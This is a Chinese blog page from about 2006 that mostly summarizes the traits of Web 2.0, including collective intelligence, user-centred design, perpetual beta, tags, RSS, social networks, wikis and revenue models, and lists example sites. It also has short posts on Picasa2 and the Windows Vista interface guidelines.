5、Picasa2:对于数码时代所带来的照片泛滥,或许Picasa2能够是一个不错的解决方案,反正它帮助我找到了遗失在硬盘里的一些照片,Picasa也让我抛弃了用了很长时间的D版ACDsee。
安全访问维基百科的方法从时昭的blog上看到访问维基百科的方法,虽然没有以前方便,不过毕竟是一种简便可用的方法,转贴过来。
1/13/2006 Windows Vista 推出界面指南了~微软的最新版本Windows Vista 的界面指南推出了~..
![]() 根据微软消息这个指南包关于Windows Vista 用户指南。里面包括了Windows Vista的最新功能,美学设计,操作指南.其中操作指南包括了对文本,界面和程式.这个教程将会对设计师和软件开发人员创造好质量,美观的程式有着很大的帮助 指南下载: 英文版下载 12/7/2005 Web2.0特点纪要Web2.0特点纪要
(以下系参阅大量关于web2.0的文章,基于我对web2.0的理解,重新整理的版本。)
定义 和讯CEO谢文对web2.0的定义:“Web 2.0 是以个人为基础,以满足个性化需求为手段,通过鼓励建立人与人之间的关系,形成社区化的生活方式的平台。” Tim他总结的Web 2.0的七大特性包括:Web作为平台、借力集体智慧、数据成为下一个Intel Inside、软件发行周期的终结、轻量级编程模式、超越单一设备层次的软件、富用户体验。他进而提出了八项Web 2.0设计范式:长尾、数据成为下一个Intel Inside、用户增添价值、网络作用作为默认值、保留部分权利、永远的beta、合作而不是控制、软件超越单一设备层次。 Tangos也列出了他所理解的Web 2.0的四个核心特性:可重用的微内容、以用户(人)为中心,而不是以物为中心、社会性、用户参与的架构。实际上后三个特性应该算是一个特性,即开放的参与架构。归根结底,这是一种观念。观念的改变,有时候要远远难于技术的升级。
Web作为平台 在Tim看来,Web 2.0最核心的观念就是,“Web作为平台”。Web平台是通过分享或参与体系搭建起来的,是对“集体智慧”的充分理解和利用,而不再是大企业的资源垄断。 Web 2.0时代,用户节点成为了最重要的网络元素,用户之间的交互作用将会是最主要的网络活动。 web 2.0 需要合作,因为是个平台, 需要用户的参与,需要逐渐形成一个产业链, 单个平台容易被打垮,但是产业链不太容易被轻易挤垮。
利用集体智慧 借力于集体智慧(Harnessing collective intelligence); 从消费者自服务中产生长尾优势(Leveraging the long tail through customer self-service); Web 2.0的原则之一就是,与其相信自己的所谓优势,不如相信你的用户,相信集体智慧,相信开放的开发模式,相信参与者越多质量越好。 Yahoo! 是第首例伟大的成功故事,诞生于一个分类目录,或者说是链接目录,一个对数万甚至数百万网络用户的最精彩作品的汇总。其作为一个门户来收集网络用户们集体作品的角色,依然是其价值核心。 Google的AdSense产品,已经在为几十万的广告客户服务。他的成功源自于对克里斯·安德森(Chris Anderson)提到的所谓“长尾”的领悟,即众多小网站集体的力量提供了互联网的大多数内容。 利用集体智慧,亦被称作是利用可重用的微内容,微内容来自于用户产生的各种数据, “比如一则网志,评论,图片,收藏的书签,喜好的音乐列表、想要做的事情,想要去的地方、新的朋友等等”。这使我们在任何地方都自由地使用这些微内容成为可能,从而可以聚合、管理、分享、迁移这些微内容,并可以进一步组合(remix and mashup)成各种个性化的丰富应用。对于用户而言,可以使用多种工具来聚合和利用这些微内容,而不必局限于生成内容的原始网站。
以用户(人)为中心 以用户(人)为中心,而不是以物为中心、采用社会性、用户参与的架构。 Web2.0的整体流程就是用户如何获得来自四个方面的数据(官方的、用户的、聚合的以及元数据)、混合并交付这些数据。在这里,用户个人才是真正的中心,所有的技术和应用都是围绕着用户来展开的。也就是说,用户个人才是Web2.0的真正主人。 Web1.0中,网站关心的焦点是物,比如Amazon上的商品,Amazon对数据的处理是按照“买这本书的人还买了哪些书”,以商品为中心来组织数据,人是隐藏在背后的,没有得到呈现的。而Web2.0中是以用户为中心来组织数据,比如在豆瓣中记录你阅读了哪些书,哪些人和你阅读同一本书,虽然人依然是通过书这个载体而连接在一起,但人成为关心的焦点,与组织的中心。论坛与BBS虽然也是用户参与的,但为什么我们不将它作为Web2.0,一个因素就在于BBS也是以物(论题)为中心进行组织的,而不是以人为中心来组织数据(比如Blog)。 社会性:社会性特征是Web2.0服务所普遍具有的特征,这不仅仅指UUzone这类的社交网站,而且像douban、seehaha这些网站都包含社会性的元素,甚至Bloglines、Rojo这样的工具性服务都带有多少人订阅这个Feed、推荐Feed给好友等社会性的特征在其中。社会性为网站带来更多的用户互动并产生丰富内容,使网站服务的使用价值与吸引力都大为增加。 用户参与的架构:用户的参与性是几乎所有人都提到的Web2.0的特性,Web2.0必须采用的是一种鼓励用户的参与和贡献的架构,改变了以往那种“只读”的属性,将网站变成可读写的服务。这种用户参与的架构可以分为两个层面,一是在网站内容层面,通过鼓励用户的参与构建正向的网络效应,使网站的服务更具吸引力,比如唯基百科、Flickr、豆瓣,另一个层面,是通过开放API,利用用户的参与和贡献,形成一个围绕网站服务的良性生态网络,增强服务的功能与竞争力。 用户参与性的一个潜在的前提是用户参与的架构意味着对用户的信任,相信用户能够合理地为URL/书籍/图片标注Tag,相信用户能够聪明地用API开发出更有用的附加功能,相信用户所产生的群智的力量。潜在的特点是用户往往是在利己的基础上参与网站的服务,而无形中达到利他的效果,比如网摘服务首先是满足用户自身的资讯保存的需求,豆瓣的服务是满足用户记录自己的阅读历史的服务,发掘和充分利用用户这种利己的特性才是让Web2.0的服务更吸引人的重要因素。
永远的beta版 “永远的测试版”和网站上的BETA标志,就是说要一直将自己的产品看成Beta版,提醒自己需要不断改进、创新。 尽早推出。不要等到服务“完美”了之后再推出,而是让你的用户去帮助你完善服务,通过用户的完善才是真正尊重用户体验与用户需求的完善,比你闭门造车的结果要好得多。而且持续有新的功能推出反而会更加吸引到你的用户继续使用。 产品在开放状态下开发,新的功能以每月、每周、甚至每天的速度被加入进来。 Google的很多产品,比如Google News、Froogle、Gmail、Groups等等,推出很长时间了,还是打着BETA的标志。Flickr、del.icio.us,和其他类似的服务,可能都会在某个阶段打着测试版的标识多年。
关键字:
【TAGS】 “分众分类”是一种使用用户自由选择的关键词对网站进行协作分类的方式,而这些关键词一般称为标签(tags)。 像del.icio.us(美味书签)和Flickr这样的网站,其公司已经在近期获得了广泛的关注,并且已经在一种被人们成为“分众分类”(folksonomy,有别于传统分类法)的概念上成为先行者。 标签化运用了像大脑本身所使用的那种多重的、重叠的关联,而不是死板的分类。 (按:举一个经典的例子,在Flickr网站上,一幅小狗照片可能被加上“小狗”、“宠物”和“可爱”等这样的标签,相当于给文章或者照片等列举若干个关键词,从而允许系统依照用户行为所产生的自然的方式来进行检索。)
【RSS】 Web 2.0时代一项最受追捧的特性就是博客的兴起。博客的按时间顺序来排列的结构“看起来像是一个微不足道的变化,但却推动着一个迥然不同的分发、广告和价值链。”其中一大变化就是一项称为RSS的技术。从而每当该页面产生了变化时都会得到通知。斯格仁塔将之称为“增量的互联网”(incremental web)。其他人则称之为“鲜活的互联网”(live web)。RSS现在不仅用于推送新的博客文章的通知,还可以用于其他各种各样的数据更新,包括股票报价、天气情况、以及图片。但是,RSS只是令博客区别于同普通网页的一部分原因。 许多方面,RSS同固定链接的结合,为HTPP(互联网协议)增添了NNTP(新闻组的网络新闻协议)的许多特性。人们不仅可以相互订阅网站并方便地链接到一个页面上的特定评论,而且通过一种称为引用通告(trackbacks)的机制,可以得知其他任何人链接到了他们的页面,并且可以用相互链接或者添加评论的方式来做出回应。像维基百科全书说的一样,博客将集体智慧用作一种过滤器。 RSS对于行业人士了解行业信息几乎是必备功能,我相信这是目前最大的一个应用。而普通人几乎没有比要要去了解所有新闻,只有行业人士有必要仔细辨析,比较细微的差别。
【SNS】 社会性网络(SNS)用于行业人士之间的交往,应该是其最佳的应用领域,基本是各取所需,对各方都有利。 SNS主要的像orkut、Wallop、yahoo360°、猫扑、豆瓣、uuzone、圈网中国等这样的网站。
【Wiki】 Wiki对于普及行业知识是非常有价值的,大多数行业专业性较强,同时更新也快,各类专业书籍一般都是挂一漏万,如果每个行业门户都搞个本行业的Wiki,工作量不会太大,但对行业人士的价值却是巨大的。这也能体现行业门户的价值。
【收入模式】 跟web2.0相关的网站的收入模式: 1、豆瓣模式;通过基于关注图书、影视的人群形成的圈子和其中的信任关系,与相关电子商务网站(如当当、卓越)建立合作分成的的利益链。 2、博客网模式;博客网现在的收入基本上与web2.0无关,主要就是广告和短信。 3、blogbus模式;blogbus有一部分重要的收入来自于VIP用户所交的服务费,用户为自己获得的增值服务付费,比如为更大存储空间、数据备份、独立域名等等,据说blogbus靠这部分VIP收费基本可以收支平衡。 4、社区化的生活方式:靠虚拟的信任关系收费,这个目前也没有成形的模式。
总结: Web2.0的核心是草根精神,如果要作为行业门户,只有能真正调动其行业内草根人士的参与,才能真正成其为行业门户。
所以现在要做的,只是努力地发现、创造用户的需求,去为用户创造价值。用户认为你有价值,你就能赚钱。
国外web2.0典型网站:
http://www.Wikipedia.com 维基百科全书 http://www.bloglines.com/ http://www.flickr.com/ (Yahoo!收购) http://www.TypePad.com http://www.Basecamp.com http://www.typepad.com/ http://www.37signals.com/ http://www.upcoming.org http://www.DoubleClick.com http://www.rojo.com/today/ Amazon del.icio.us(美味书签) Skype (被eBay收购) Weblogs (被AOL收购) Upcoming.org (被Yahoo!收购)
国内web2.0典型网站:
http://www.douban.com/ 豆瓣 http://www.toodou.com/index.html 土豆 http://www.seehaha.com/ http://www.gougou.com/ 狗狗 http://www.yupoo.com/ (仿flickr的) http://www.bokee.com/
|
|
|